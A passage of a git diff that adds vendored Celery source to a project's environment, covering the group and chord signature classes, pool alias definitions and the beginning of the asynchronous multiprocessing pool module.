+ # + # We return a concretised tuple of the signatures actually applied to + # each child task signature, of which there might be none! + return tuple(child_task.link_error(sig.clone(immutable=True)) for child_task in self.tasks) + + def _prepared(self, tasks, partial_args, group_id, root_id, app, + CallableSignature=abstract.CallableSignature, + from_dict=Signature.from_dict, + isinstance=isinstance, tuple=tuple): + """Recursively unroll the group into a generator of its tasks. + + This is used by :meth:`apply_async` and :meth:`apply` to + unroll the group into a list of tasks that can be evaluated. + + Note: + This does not change the group itself, it only returns + a generator of the tasks that the group would evaluate to. + + Arguments: + tasks (list): List of tasks in the group (may contain nested groups). + partial_args (list): List of arguments to be prepended to + the arguments of each task. + group_id (str): The group id of the group. + root_id (str): The root id of the group. + app (Celery): The Celery app instance. + CallableSignature (class): The signature class of the group's tasks. + from_dict (fun): Function to create a signature from a dict. + isinstance (fun): Function to check if an object is an instance + of a class. + tuple (class): A tuple-like class. + + Returns: + generator: A generator for the unrolled group tasks. + The generator yields tuples of the form ``(task, AsyncResult, group_id)``. + """ + for index, task in enumerate(tasks): + if isinstance(task, CallableSignature): + # local sigs are always of type Signature, and we + # clone them to make sure we don't modify the originals. + task = task.clone() + else: + # serialized sigs must be converted to Signature. + task = from_dict(task, app=app) + if isinstance(task, group): + # needs yield_from :( + unroll = task._prepared( + task.tasks, partial_args, group_id, root_id, app, + ) + yield from unroll + else: + if partial_args and not task.immutable: + task.args = tuple(partial_args) + tuple(task.args) + yield task, task.freeze(group_id=group_id, root_id=root_id, group_index=index), group_id + + def _apply_tasks(self, tasks, producer=None, app=None, p=None, + add_to_parent=None, chord=None, + args=None, kwargs=None, **options): + """Run all the tasks in the group. + + This is used by :meth:`apply_async` to run all the tasks in the group + and return a generator of their results. + + Arguments: + tasks (list): List of tasks in the group. + producer (Producer): The producer to use to publish the tasks. + app (Celery): The Celery app instance. + p (barrier): Barrier object to synchronize the tasks results. + args (list): List of arguments to be prepended to + the arguments of each task. + kwargs (dict): Dict of keyword arguments to be merged with + the keyword arguments of each task. + **options (dict): Options to be merged with the options of each task. + + Returns: + generator: A generator for the AsyncResult of the tasks in the group. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + app = app or self.app + with app.producer_or_acquire(producer) as producer: + # Iterate through tasks two at a time. If tasks is a generator, + # we are able to tell when we are at the end by checking if + # next_task is None. This enables us to set the chord size + # without burning through the entire generator. See #3021. 
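+            # Illustrative sketch of that lookahead pattern, not part of the
+            # original code: ``itertools.tee`` duplicates the iterator, and the
+            # copy is kept one step ahead so that ``next_task is None`` marks
+            # the final element without materialising the whole generator.
+            #
+            #     >>> import itertools
+            #     >>> ahead, items = itertools.tee(iter([1, 2, 3]))
+            #     >>> next(ahead, None)     # shift the lookahead copy
+            #     1
+            #     >>> [(item, next(ahead, None)) for item in items]
+            #     [(1, 2), (2, 3), (3, None)]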
+ chord_size = 0 + tasks_shifted, tasks = itertools.tee(tasks) + next(tasks_shifted, None) + next_task = next(tasks_shifted, None) + + for task_index, current_task in enumerate(tasks): + # We expect that each task must be part of the same group which + # seems sensible enough. If that's somehow not the case we'll + # end up messing up chord counts and there are all sorts of + # awful race conditions to think about. We'll hope it's not! + sig, res, group_id = current_task + chord_obj = chord if chord is not None else sig.options.get("chord") + # We need to check the chord size of each contributing task so + # that when we get to the final one, we can correctly set the + # size in the backend and the chord can be sensible completed. + chord_size += _chord._descend(sig) + if chord_obj is not None and next_task is None: + # Per above, sanity check that we only saw one group + app.backend.set_chord_size(group_id, chord_size) + sig.apply_async(producer=producer, add_to_parent=False, + chord=chord_obj, args=args, kwargs=kwargs, + **options) + # adding callback to result, such that it will gradually + # fulfill the barrier. + # + # Using barrier.add would use result.then, but we need + # to add the weak argument here to only create a weak + # reference to the object. + if p and not p.cancelled and not p.ready: + p.size += 1 + res.then(p, weak=True) + next_task = next(tasks_shifted, None) + yield res # <-- r.parent, etc set in the frozen result. + + def _freeze_gid(self, options): + """Freeze the group id by the existing task_id or a new UUID.""" + # remove task_id and use that as the group_id, + # if we don't remove it then every task will have the same id... + options = {**self.options, **{ + k: v for k, v in options.items() + if k not in self._IMMUTABLE_OPTIONS or k not in self.options + }} + options['group_id'] = group_id = ( + options.pop('task_id', uuid())) + return options, group_id, options.get('root_id') + + def _freeze_group_tasks(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + """Freeze the tasks in the group. + + Note: + If the group tasks are created from a generator, the tasks generator would + not be exhausted, and the tasks would be frozen lazily. + + Returns: + tuple: A tuple of the group id, and the AsyncResult of each of the group tasks. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + opts = self.options + try: + gid = opts['task_id'] + except KeyError: + gid = opts['task_id'] = group_id or uuid() + if group_id: + opts['group_id'] = group_id + if chord: + opts['chord'] = chord + if group_index is not None: + opts['group_index'] = group_index + root_id = opts.setdefault('root_id', root_id) + parent_id = opts.setdefault('parent_id', parent_id) + if isinstance(self.tasks, _regen): + # When the group tasks are a generator, we need to make sure we don't + # exhaust it during the freeze process. We use two generators to do this. + # One generator will be used to freeze the tasks to get their AsyncResult. + # The second generator will be used to replace the tasks in the group with an unexhausted state. + + # Create two new generators from the original generator of the group tasks (cloning the tasks). + tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks)) + # Use the first generator to freeze the group tasks to acquire the AsyncResult for each task. 
+ results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id)) + # Use the second generator to replace the exhausted generator of the group tasks. + self.tasks = regen(tasks2) + else: + new_tasks = [] + # Need to unroll subgroups early so that chord gets the + # right result instance for chord_unlock etc. + results = list(self._freeze_unroll( + new_tasks, group_id, chord, root_id, parent_id, + )) + if isinstance(self.tasks, MutableSequence): + self.tasks[:] = new_tasks + else: + self.tasks = new_tasks + return gid, results + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + return self.app.GroupResult(*self._freeze_group_tasks( + _id=_id, group_id=group_id, + chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index + )) + + _freeze = freeze + + def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id): + """Creates a generator for the AsyncResult of each task in the tasks argument.""" + yield from (task.freeze(group_id=group_id, + chord=chord, + root_id=root_id, + parent_id=parent_id, + group_index=group_index) + for group_index, task in enumerate(tasks)) + + def _unroll_tasks(self, tasks): + """Creates a generator for the cloned tasks of the tasks argument.""" + # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks) + yield from (maybe_signature(task, app=self._app).clone() for task in tasks) + + def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id): + """Generator for the frozen flattened group tasks. + + Creates a flattened list of the tasks in the group, and freezes + each task in the group. Nested groups will be recursively flattened. + + Exhausting the generator will create a new list of the flattened + tasks in the group and will return it in the new_tasks argument. + + Arguments: + new_tasks (list): The list to append the flattened tasks to. + group_id (str): The group_id to use for the tasks. + chord (Chord): The chord to use for the tasks. + root_id (str): The root_id to use for the tasks. + parent_id (str): The parent_id to use for the tasks. + + Yields: + AsyncResult: The frozen task. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + stack = deque(self.tasks) + group_index = 0 + while stack: + task = maybe_signature(stack.popleft(), app=self._app).clone() + # if this is a group, flatten it by adding all of the group's tasks to the stack + if isinstance(task, group): + stack.extendleft(task.tasks) + else: + new_tasks.append(task) + yield task.freeze(group_id=group_id, + chord=chord, root_id=root_id, + parent_id=parent_id, + group_index=group_index) + group_index += 1 + + def __repr__(self): + if self.tasks: + return remove_repeating_from_task( + self.tasks[0]['task'], + f'group({self.tasks!r})') + return 'group()' + + def __len__(self): + return len(self.tasks) + + @property + def app(self): + app = self._app + if app is None: + try: + app = self.tasks[0].app + except LookupError: + pass + return app if app is not None else current_app + + +@Signature.register_type(name="chord") +class _chord(Signature): + r"""Barrier synchronization primitive. + + A chord consists of a header and a body. + + The header is a group of tasks that must complete before the callback is + called. A chord is essentially a callback for a group of tasks. + + The body is applied with the return values of all the header + tasks as a list. + + Example: + + The chord: + + .. 
code-block:: pycon + + >>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s()) + + is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`: + + .. code-block:: pycon + + >>> res.get() + 12 + """ + + @classmethod + def from_dict(cls, d, app=None): + """Create a chord signature from a dictionary that represents a chord. + + Example: + >>> chord_dict = { + "task": "celery.chord", + "args": [], + "kwargs": { + "kwargs": {}, + "header": [ + { + "task": "add", + "args": [ + 1, + 2 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + }, + { + "task": "add", + "args": [ + 3, + 4 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + ], + "body": { + "task": "xsum", + "args": [], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + }, + "options": {}, + "subtask_type": "chord", + "immutable": False + } + >>> chord_sig = chord.from_dict(chord_dict) + + Iterates over the given tasks in the dictionary and convert them to signatures. + Chord header needs to be defined in d['kwargs']['header'] as a sequence + of tasks. + Chord body needs to be defined in d['kwargs']['body'] as a single task. + + The tasks themselves can be dictionaries or signatures (or both). + """ + options = d.copy() + args, options['kwargs'] = cls._unpack_args(**options['kwargs']) + return cls(*args, app=app, **options) + + @staticmethod + def _unpack_args(header=None, body=None, **kwargs): + # Python signatures are better at extracting keys from dicts + # than manually popping things off. + return (header, body), kwargs + + def __init__(self, header, body=None, task='celery.chord', + args=None, kwargs=None, app=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {'kwargs': {}} + super().__init__(task, args, + {**kwargs, 'header': _maybe_group(header, app), + 'body': maybe_signature(body, app=app)}, app=app, **options + ) + self.subtask_type = 'chord' + + def __call__(self, body=None, **options): + return self.apply_async((), {'body': body} if body else {}, **options) + + def __or__(self, other): + if (not isinstance(other, (group, _chain)) and + isinstance(other, Signature)): + # chord | task -> attach to body + sig = self.clone() + sig.body = sig.body | other + return sig + elif isinstance(other, group) and len(other.tasks) == 1: + # chord | group -> chain with chord body. + # unroll group with one member + other = maybe_unroll_group(other) + sig = self.clone() + sig.body = sig.body | other + return sig + else: + return super().__or__(other) + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. 
+ if not isinstance(self.tasks, group): + self.tasks = group(self.tasks, app=self.app) + # first freeze all tasks in the header + header_result = self.tasks.freeze( + parent_id=parent_id, root_id=root_id, chord=self.body) + self.id = self.tasks.id + # secondly freeze all tasks in the body: those that should be called after the header + + body_result = None + if self.body: + body_result = self.body.freeze( + _id, root_id=root_id, chord=chord, group_id=group_id, + group_index=group_index) + # we need to link the body result back to the group result, + # but the body may actually be a chain, + # so find the first result without a parent + node = body_result + seen = set() + while node: + if node.id in seen: + raise RuntimeError('Recursive result parents') + seen.add(node.id) + if node.parent is None: + node.parent = header_result + break + node = node.parent + + return body_result + + def stamp(self, visitor=None, append_stamps=False, **headers): + tasks = self.tasks + if isinstance(tasks, group): + tasks = tasks.tasks + + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_chord_header_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, append_stamps, **headers) + + if isinstance(tasks, _regen): + tasks.map(_partial(_stamp_regen_task, visitor=visitor, append_stamps=append_stamps, **headers)) + else: + stamps = headers.copy() + for task in tasks: + task.stamp(visitor, append_stamps, **stamps) + + if visitor is not None: + visitor.on_chord_header_end(self, **headers) + + if visitor is not None and self.body is not None: + visitor_headers = visitor.on_chord_body(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.body.stamp(visitor, append_stamps, **headers) + + def apply_async(self, args=None, kwargs=None, task_id=None, + producer=None, publisher=None, connection=None, + router=None, result_cls=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + args = (tuple(args) + tuple(self.args) + if args and not self.immutable else self.args) + body = kwargs.pop('body', None) or self.kwargs['body'] + kwargs = dict(self.kwargs['kwargs'], **kwargs) + body = body.clone(**options) + app = self._get_app(body) + tasks = (self.tasks.clone() if isinstance(self.tasks, group) + else group(self.tasks, app=app, task_id=self.options.get('task_id', uuid()))) + if app.conf.task_always_eager: + with allow_join_result(): + return self.apply(args, kwargs, + body=body, task_id=task_id, **options) + + merged_options = dict(self.options, **options) if options else self.options + option_task_id = merged_options.pop("task_id", None) + if task_id is None: + task_id = option_task_id + + # chord([A, B, ...], C) + return self.run(tasks, body, args, task_id=task_id, kwargs=kwargs, **merged_options) + + def apply(self, args=None, kwargs=None, + propagate=True, body=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + body = self.body if body is None else body + tasks = (self.tasks.clone() if isinstance(self.tasks, group) + else group(self.tasks, app=self.app)) + return body.apply( + args=(tasks.apply(args, kwargs).get(propagate=propagate),), + ) + + @classmethod + def _descend(cls, sig_obj): + """Count the number of tasks in the given signature recursively. + + Descend into the signature object and return the amount of tasks it contains. 
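+
+        Example (illustrative sketch, assuming an ``add`` task as in the
+        examples above):
+
+            >>> sig = group([add.s(1, 1), chain(add.s(2, 2), add.s(4))])
+            >>> _chord._descend(sig)
+            2
+
+        The group contributes one count for the simple signature and one for
+        the final task of the chain.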
+ """ + # Sometimes serialized signatures might make their way here + if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict): + sig_obj = Signature.from_dict(sig_obj) + if isinstance(sig_obj, group): + # Each task in a group counts toward this chord + subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks) + return sum(cls._descend(task) for task in subtasks) + elif isinstance(sig_obj, _chain): + # The last non-empty element in a chain counts toward this chord + for child_sig in sig_obj.tasks[-1::-1]: + child_size = cls._descend(child_sig) + if child_size > 0: + return child_size + # We have to just hope this chain is part of some encapsulating + # signature which is valid and can fire the chord body + return 0 + elif isinstance(sig_obj, chord): + # The child chord's body counts toward this chord + return cls._descend(sig_obj.body) + elif isinstance(sig_obj, Signature): + # Each simple signature counts as 1 completion for this chord + return 1 + # Any other types are assumed to be iterables of simple signatures + return len(sig_obj) + + def __length_hint__(self): + """Return the number of tasks in this chord's header (recursively).""" + tasks = getattr(self.tasks, "tasks", self.tasks) + return sum(self._descend(task) for task in tasks) + + def run(self, header, body, partial_args, app=None, interval=None, + countdown=1, max_retries=None, eager=False, + task_id=None, kwargs=None, **options): + """Execute the chord. + + Executing the chord means executing the header and sending the + result to the body. In case of an empty header, the body is + executed immediately. + + Arguments: + header (group): The header to execute. + body (Signature): The body to execute. + partial_args (tuple): Arguments to pass to the header. + app (Celery): The Celery app instance. + interval (float): The interval between retries. + countdown (int): The countdown between retries. + max_retries (int): The maximum number of retries. + task_id (str): The task id to use for the body. + kwargs (dict): Keyword arguments to pass to the header. + options (dict): Options to pass to the header. + + Returns: + AsyncResult: The result of the body (with the result of the header in the parent of the body). + """ + app = app or self._get_app(body) + group_id = header.options.get('task_id') or uuid() + root_id = body.options.get('root_id') + options = dict(self.options, **options) if options else self.options + if options: + options.pop('task_id', None) + body.options.update(options) + + bodyres = body.freeze(task_id, root_id=root_id) + + # Chains should not be passed to the header tasks. See #3771 + options.pop('chain', None) + # Neither should chords, for deeply nested chords to work + options.pop('chord', None) + options.pop('task_id', None) + + header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id) + + if header.tasks: + app.backend.apply_chord( + header_result_args, + body, + interval=interval, + countdown=countdown, + max_retries=max_retries, + ) + header_result = header.apply_async(partial_args, kwargs, task_id=group_id, **options) + # The execution of a chord body is normally triggered by its header's + # tasks completing. If the header is empty this will never happen, so + # we execute the body manually here. 
+ else: + body.delay([]) + header_result = self.app.GroupResult(*header_result_args) + + bodyres.parent = header_result + return bodyres + + def clone(self, *args, **kwargs): + signature = super().clone(*args, **kwargs) + # need to make copy of body + try: + signature.kwargs['body'] = maybe_signature( + signature.kwargs['body'], clone=True) + except (AttributeError, KeyError): + pass + return signature + + def link(self, callback): + """Links a callback to the chord body only.""" + self.body.link(callback) + return callback + + def link_error(self, errback): + """Links an error callback to the chord body, and potentially the header as well. + + Note: + The ``task_allow_error_cb_on_chord_header`` setting controls whether + error callbacks are allowed on the header. If this setting is + ``False`` (the current default), then the error callback will only be + applied to the body. + """ + if self.app.conf.task_allow_error_cb_on_chord_header: + for task in maybe_list(self.tasks) or []: + task.link_error(errback.clone(immutable=True)) + else: + # Once this warning is removed, the whole method needs to be refactored to: + # 1. link the error callback to each task in the header + # 2. link the error callback to the body + # 3. return the error callback + # In summary, up to 4 lines of code + updating the method docstring. + warnings.warn( + "task_allow_error_cb_on_chord_header=False is pending deprecation in " + "a future release of Celery.\n" + "Please test the new behavior by setting task_allow_error_cb_on_chord_header to True " + "and report any concerns you might have in our issue tracker before we make a final decision " + "regarding how errbacks should behave when used with chords.", + CPendingDeprecationWarning + ) + + self.body.link_error(errback) + return errback + + def set_immutable(self, immutable): + """Sets the immutable flag on the chord header only. + + Note: + Does not affect the chord body. + + Arguments: + immutable (bool): The new mutability value for chord header. + """ + for task in self.tasks: + task.set_immutable(immutable) + + def __repr__(self): + if self.body: + if isinstance(self.body, _chain): + return remove_repeating_from_task( + self.body.tasks[0]['task'], + '%({} | {!r})'.format( + self.body.tasks[0].reprcall(self.tasks), + chain(self.body.tasks[1:], app=self._app), + ), + ) + return '%' + remove_repeating_from_task( + self.body['task'], self.body.reprcall(self.tasks)) + return f'' + + @cached_property + def app(self): + return self._get_app(self.body) + + def _get_app(self, body=None): + app = self._app + if app is None: + try: + tasks = self.tasks.tasks # is a group + except AttributeError: + tasks = self.tasks + if tasks: + app = tasks[0]._app + if app is None and body is not None: + app = body._app + return app if app is not None else current_app + + tasks = getitem_property('kwargs.header', 'Tasks in chord header.') + body = getitem_property('kwargs.body', 'Body task of chord.') + + +# Add a back-compat alias for the previous `chord` class name which conflicts +# with keyword arguments elsewhere in this file +chord = _chord + + +def signature(varies, *args, **kwargs): + """Create new signature. + + - if the first argument is a signature already then it's cloned. + - if the first argument is a dict, then a Signature version is returned. + + Returns: + Signature: The resulting signature. 
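+
+    Example (illustrative sketch; ``tasks.add`` is a placeholder task name):
+
+        >>> sig = signature('tasks.add', args=(2, 2), countdown=10)
+        >>> sig = signature(dict(sig))  # a dict is converted back to a Signature
+        >>> sig = signature(sig)        # an existing signature is cloned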
+ """ + app = kwargs.get('app') + if isinstance(varies, dict): + if isinstance(varies, abstract.CallableSignature): + return varies.clone() + return Signature.from_dict(varies, app=app) + return Signature(varies, *args, **kwargs) + + +subtask = signature # XXX compat + + +def maybe_signature(d, app=None, clone=False): + """Ensure obj is a signature, or None. + + Arguments: + d (Optional[Union[abstract.CallableSignature, Mapping]]): + Signature or dict-serialized signature. + app (celery.Celery): + App to bind signature to. + clone (bool): + If d' is already a signature, the signature + will be cloned when this flag is enabled. + + Returns: + Optional[abstract.CallableSignature] + """ + if d is not None: + if isinstance(d, abstract.CallableSignature): + if clone: + d = d.clone() + elif isinstance(d, dict): + d = signature(d) + + if app is not None: + d._app = app + return d + + +maybe_subtask = maybe_signature # XXX compat diff --git a/env/Lib/site-packages/celery/concurrency/__init__.py b/env/Lib/site-packages/celery/concurrency/__init__.py new file mode 100644 index 00000000..4953f463 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/__init__.py @@ -0,0 +1,48 @@ +"""Pool implementation abstract factory, and alias definitions.""" +import os + +# Import from kombu directly as it's used +# early in the import stage, where celery.utils loads +# too much (e.g., for eventlet patching) +from kombu.utils.imports import symbol_by_name + +__all__ = ('get_implementation', 'get_available_pool_names',) + +ALIASES = { + 'prefork': 'celery.concurrency.prefork:TaskPool', + 'eventlet': 'celery.concurrency.eventlet:TaskPool', + 'gevent': 'celery.concurrency.gevent:TaskPool', + 'solo': 'celery.concurrency.solo:TaskPool', + 'processes': 'celery.concurrency.prefork:TaskPool', # XXX compat alias +} + +try: + import concurrent.futures # noqa +except ImportError: + pass +else: + ALIASES['threads'] = 'celery.concurrency.thread:TaskPool' +# +# Allow for an out-of-tree worker pool implementation. This is used as follows: +# +# - Set the environment variable CELERY_CUSTOM_WORKER_POOL to the name of +# an implementation of :class:`celery.concurrency.base.BasePool` in the +# standard Celery format of "package:class". +# - Select this pool using '--pool custom'. +# +try: + custom = os.environ.get('CELERY_CUSTOM_WORKER_POOL') +except KeyError: + pass +else: + ALIASES['custom'] = custom + + +def get_implementation(cls): + """Return pool implementation by name.""" + return symbol_by_name(cls, ALIASES) + + +def get_available_pool_names(): + """Return all available pool type names.""" + return tuple(ALIASES.keys()) diff --git a/env/Lib/site-packages/celery/concurrency/asynpool.py b/env/Lib/site-packages/celery/concurrency/asynpool.py new file mode 100644 index 00000000..c024e685 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/asynpool.py @@ -0,0 +1,1360 @@ +"""Version of multiprocessing.Pool using Async I/O. + +.. note:: + + This module will be moved soon, so don't use it directly. + +This is a non-blocking version of :class:`multiprocessing.Pool`. + +This code deals with three major challenges: + +#. Starting up child processes and keeping them running. +#. Sending jobs to the processes and receiving results back. +#. Safely shutting down this system. 
+""" +import errno +import gc +import inspect +import os +import select +import time +from collections import Counter, deque, namedtuple +from io import BytesIO +from numbers import Integral +from pickle import HIGHEST_PROTOCOL +from struct import pack, unpack, unpack_from +from time import sleep +from weakref import WeakValueDictionary, ref + +from billiard import pool as _pool +from billiard.compat import isblocking, setblocking +from billiard.pool import ACK, NACK, RUN, TERMINATE, WorkersJoined +from billiard.queues import _SimpleQueue +from kombu.asynchronous import ERR, WRITE +from kombu.serialization import pickle as _pickle +from kombu.utils.eventio import SELECT_BAD_FD +from kombu.utils.functional import fxrange +from vine import promise + +from celery.signals import worker_before_create_process +from celery.utils.functional import noop +from celery.utils.log import get_logger +from celery.worker import state as worker_state + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + +try: + from _billiard import read as __read__ + readcanbuf = True + +except ImportError: + + def __read__(fd, buf, size, read=os.read): + chunk = read(fd, size) + n = len(chunk) + if n != 0: + buf.write(chunk) + return n + readcanbuf = False + + def unpack_from(fmt, iobuf, unpack=unpack): # noqa + return unpack(fmt, iobuf.getvalue()) # <-- BytesIO + +__all__ = ('AsynPool',) + +logger = get_logger(__name__) +error, debug = logger.error, logger.debug + +UNAVAIL = frozenset({errno.EAGAIN, errno.EINTR}) + +#: Constant sent by child process when started (ready to accept work) +WORKER_UP = 15 + +#: A process must've started before this timeout (in secs.) expires. +PROC_ALIVE_TIMEOUT = 4.0 + +SCHED_STRATEGY_FCFS = 1 +SCHED_STRATEGY_FAIR = 4 + +SCHED_STRATEGIES = { + None: SCHED_STRATEGY_FAIR, + 'default': SCHED_STRATEGY_FAIR, + 'fast': SCHED_STRATEGY_FCFS, + 'fcfs': SCHED_STRATEGY_FCFS, + 'fair': SCHED_STRATEGY_FAIR, +} +SCHED_STRATEGY_TO_NAME = {v: k for k, v in SCHED_STRATEGIES.items()} + +Ack = namedtuple('Ack', ('id', 'fd', 'payload')) + + +def gen_not_started(gen): + """Return true if generator is not started.""" + return inspect.getgeneratorstate(gen) == "GEN_CREATED" + + +def _get_job_writer(job): + try: + writer = job._writer + except AttributeError: + pass + else: + return writer() # is a weakref + + +if hasattr(select, 'poll'): + def _select_imp(readers=None, writers=None, err=None, timeout=0, + poll=select.poll, POLLIN=select.POLLIN, + POLLOUT=select.POLLOUT, POLLERR=select.POLLERR): + poller = poll() + register = poller.register + + if readers: + [register(fd, POLLIN) for fd in readers] + if writers: + [register(fd, POLLOUT) for fd in writers] + if err: + [register(fd, POLLERR) for fd in err] + + R, W = set(), set() + timeout = 0 if timeout and timeout < 0 else round(timeout * 1e3) + events = poller.poll(timeout) + for fd, event in events: + if not isinstance(fd, Integral): + fd = fd.fileno() + if event & POLLIN: + R.add(fd) + if event & POLLOUT: + W.add(fd) + if event & POLLERR: + R.add(fd) + return R, W, 0 +else: + def _select_imp(readers=None, writers=None, err=None, timeout=0): + r, w, e = select.select(readers, writers, err, timeout) + if e: + r = list(set(r) | set(e)) + return r, w, 0 + + +def _select(readers=None, writers=None, err=None, timeout=0, + poll=_select_imp): + """Simple wrapper to :class:`~select.select`, using :`~select.poll`. + + Arguments: + readers (Set[Fd]): Set of reader fds to test if readable. 
+ writers (Set[Fd]): Set of writer fds to test if writable. + err (Set[Fd]): Set of fds to test for error condition. + + All fd sets passed must be mutable as this function + will remove non-working fds from them, this also means + the caller must make sure there are still fds in the sets + before calling us again. + + Returns: + Tuple[Set, Set, Set]: of ``(readable, writable, again)``, where + ``readable`` is a set of fds that have data available for read, + ``writable`` is a set of fds that's ready to be written to + and ``again`` is a flag that if set means the caller must + throw away the result and call us again. + """ + readers = set() if readers is None else readers + writers = set() if writers is None else writers + err = set() if err is None else err + try: + return poll(readers, writers, err, timeout) + except OSError as exc: + _errno = exc.errno + + if _errno == errno.EINTR: + return set(), set(), 1 + elif _errno in SELECT_BAD_FD: + for fd in readers | writers | err: + try: + select.select([fd], [], [], 0) + except OSError as exc: + _errno = exc.errno + + if _errno not in SELECT_BAD_FD: + raise + readers.discard(fd) + writers.discard(fd) + err.discard(fd) + return set(), set(), 1 + else: + raise + + +def iterate_file_descriptors_safely(fds_iter, source_data, + hub_method, *args, **kwargs): + """Apply hub method to fds in iter, remove from list if failure. + + Some file descriptors may become stale through OS reasons + or possibly other reasons, so safely manage our lists of FDs. + :param fds_iter: the file descriptors to iterate and apply hub_method + :param source_data: data source to remove FD if it renders OSError + :param hub_method: the method to call with with each fd and kwargs + :*args to pass through to the hub_method; + with a special syntax string '*fd*' represents a substitution + for the current fd object in the iteration (for some callers). + :**kwargs to pass through to the hub method (no substitutions needed) + """ + def _meta_fd_argument_maker(): + # uses the current iterations value for fd + call_args = args + if "*fd*" in call_args: + call_args = [fd if arg == "*fd*" else arg for arg in args] + return call_args + # Track stale FDs for cleanup possibility + stale_fds = [] + for fd in fds_iter: + # Handle using the correct arguments to the hub method + hub_args, hub_kwargs = _meta_fd_argument_maker(), kwargs + try: # Call the hub method + hub_method(fd, *hub_args, **hub_kwargs) + except (OSError, FileNotFoundError): + logger.warning( + "Encountered OSError when accessing fd %s ", + fd, exc_info=True) + stale_fds.append(fd) # take note of stale fd + # Remove now defunct fds from the managed list + if source_data: + for fd in stale_fds: + try: + if hasattr(source_data, 'remove'): + source_data.remove(fd) + else: # then not a list/set ... try dict + source_data.pop(fd, None) + except ValueError: + logger.warning("ValueError trying to invalidate %s from %s", + fd, source_data) + + +class Worker(_pool.Worker): + """Pool worker process.""" + + def on_loop_start(self, pid): + # our version sends a WORKER_UP message when the process is ready + # to accept work, this will tell the parent that the inqueue fd + # is writable. 
+ self.outq.put((WORKER_UP, (pid,))) + + +class ResultHandler(_pool.ResultHandler): + """Handles messages from the pool processes.""" + + def __init__(self, *args, **kwargs): + self.fileno_to_outq = kwargs.pop('fileno_to_outq') + self.on_process_alive = kwargs.pop('on_process_alive') + super().__init__(*args, **kwargs) + # add our custom message handler + self.state_handlers[WORKER_UP] = self.on_process_alive + + def _recv_message(self, add_reader, fd, callback, + __read__=__read__, readcanbuf=readcanbuf, + BytesIO=BytesIO, unpack_from=unpack_from, + load=_pickle.load): + Hr = Br = 0 + if readcanbuf: + buf = bytearray(4) + bufv = memoryview(buf) + else: + buf = bufv = BytesIO() + # header + + while Hr < 4: + try: + n = __read__( + fd, bufv[Hr:] if readcanbuf else bufv, 4 - Hr, + ) + except OSError as exc: + if exc.errno not in UNAVAIL: + raise + yield + else: + if n == 0: + raise (OSError('End of file during message') if Hr + else EOFError()) + Hr += n + + body_size, = unpack_from('>i', bufv) + if readcanbuf: + buf = bytearray(body_size) + bufv = memoryview(buf) + else: + buf = bufv = BytesIO() + + while Br < body_size: + try: + n = __read__( + fd, bufv[Br:] if readcanbuf else bufv, body_size - Br, + ) + except OSError as exc: + if exc.errno not in UNAVAIL: + raise + yield + else: + if n == 0: + raise (OSError('End of file during message') if Br + else EOFError()) + Br += n + add_reader(fd, self.handle_event, fd) + if readcanbuf: + message = load(BytesIO(bufv)) + else: + bufv.seek(0) + message = load(bufv) + if message: + callback(message) + + def _make_process_result(self, hub): + """Coroutine reading messages from the pool processes.""" + fileno_to_outq = self.fileno_to_outq + on_state_change = self.on_state_change + add_reader = hub.add_reader + remove_reader = hub.remove_reader + recv_message = self._recv_message + + def on_result_readable(fileno): + try: + fileno_to_outq[fileno] + except KeyError: # process gone + return remove_reader(fileno) + it = recv_message(add_reader, fileno, on_state_change) + try: + next(it) + except StopIteration: + pass + except (OSError, EOFError): + remove_reader(fileno) + else: + add_reader(fileno, it) + return on_result_readable + + def register_with_event_loop(self, hub): + self.handle_event = self._make_process_result(hub) + + def handle_event(self, *args): + # pylint: disable=method-hidden + # register_with_event_loop overrides this + raise RuntimeError('Not registered with event loop') + + def on_stop_not_started(self): + # This is always used, since we do not start any threads. + cache = self.cache + check_timeouts = self.check_timeouts + fileno_to_outq = self.fileno_to_outq + on_state_change = self.on_state_change + join_exited_workers = self.join_exited_workers + + # flush the processes outqueues until they've all terminated. + outqueues = set(fileno_to_outq) + while cache and outqueues and self._state != TERMINATE: + if check_timeouts is not None: + # make sure tasks with a time limit will time out. 
